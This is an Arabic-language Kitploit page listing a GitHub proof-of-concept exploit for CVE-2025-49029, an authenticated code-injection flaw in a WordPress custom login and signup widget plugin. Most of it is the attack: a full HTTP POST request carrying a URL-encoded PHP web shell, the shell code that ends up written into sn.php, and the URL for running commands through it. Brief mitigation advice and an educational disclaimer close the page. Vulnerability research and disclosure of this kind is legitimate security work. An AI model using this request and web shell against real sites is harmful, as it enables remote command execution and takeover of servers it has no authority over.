Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49029 — الإصدارات <= 1.0 من إضافة WordPress Custom Login And Signup Widget Plugin عرضة لتنفيذ كود تعسفي (Arbitrary Code Execution) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-49029
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-49029

CVE-2025-49029

الإصدارات <= 1.0 من إضافة WordPress Custom Login And Signup Widget Plugin عرضة لتنفيذ كود تعسفي (Arbitrary Code Execution)

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 إضافة ووردبريس لتخصيص تسجيل الدخول والتسجيل <= 1.0 - تنفيذ كود عشوائي (RCE)

🐞 ملخص الثغرة

ثغرة التحكم غير السليم في توليد الكود ('حقن الكود') في bitto.Kazi Custom Login And Signup Widget تسمح بتنفيذ كود PHP عشوائي بواسطة مستخدمي الإدارة المصادَق عليهم.
تؤثر هذه المشكلة على جميع الإصدارات حتى 1.0 وما يشملها.

🔥 النتيجة الأساسية: 9.1 (حرجة)
معرف CWE: CWE-94 – التحكم غير السليم في توليد الكود ('حقن الكود')


🧠 الوصف

تسمح الإضافة لمسؤولي الموقع بتعديل محتويات ملف sn.php عبر حقل اسم المرسل (Sender’s Name) في صفحة الإعدادات.
يتم كتابة الإدخال الذي يقدمه المستخدم مباشرة داخل ملف PHP دون أي تنظيف أو تحقق.

ونتيجة لذلك، فإن أي كود PHP يتم توفيره في معامل text سيُخزَّن داخل ملف PHP ويُتنفَّذ عند الطلب المباشر، مما يؤدي إلى تنفيذ كود عن بُعد (RCE).


📍 نقطة النهاية القابلة للاستغلال

/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes

📥 الطلب (بتنسيق Burp Suite)

POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i

text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

💉 نقطة الحقن

  • المعامل: text
  • النوع: POST
  • الصلاحية المطلوبة: مسؤول (Administrator)
  • الملف المتأثر: sn.php (تضمين إعدادات الإضافة)

🧬 المحتوى المحقون المخزَّن في الملف

<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>

📁 الملف الذي يُكتب فيه:

http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php

بعد الحقن الناجح، قم بالوصول إليه مباشرة لتنفيذ الأوامر عبر:

http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id

🛡️ التوصيات

  • تقييد عمليات كتابة الملفات.
  • تنظيف والتحقق من جميع المدخلات قبل كتابتها في ملفات PHP.
  • لا تسمح أبدًا بكتابة محتوى ديناميكي داخل ملفات .php.

⚠️ إخلاء مسؤولية

تم إنشاء هذا المشروع لأغراض تعليمية وبحثية فقط.
أي استخدام للمعلومات المقدمة يكون على مسؤوليتك الخاصة.
المؤلف لا يتحمل أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا المحتوى.


✍️ بقلم: Khaled_Alenazi (Nxploited)

تنزيل الأداة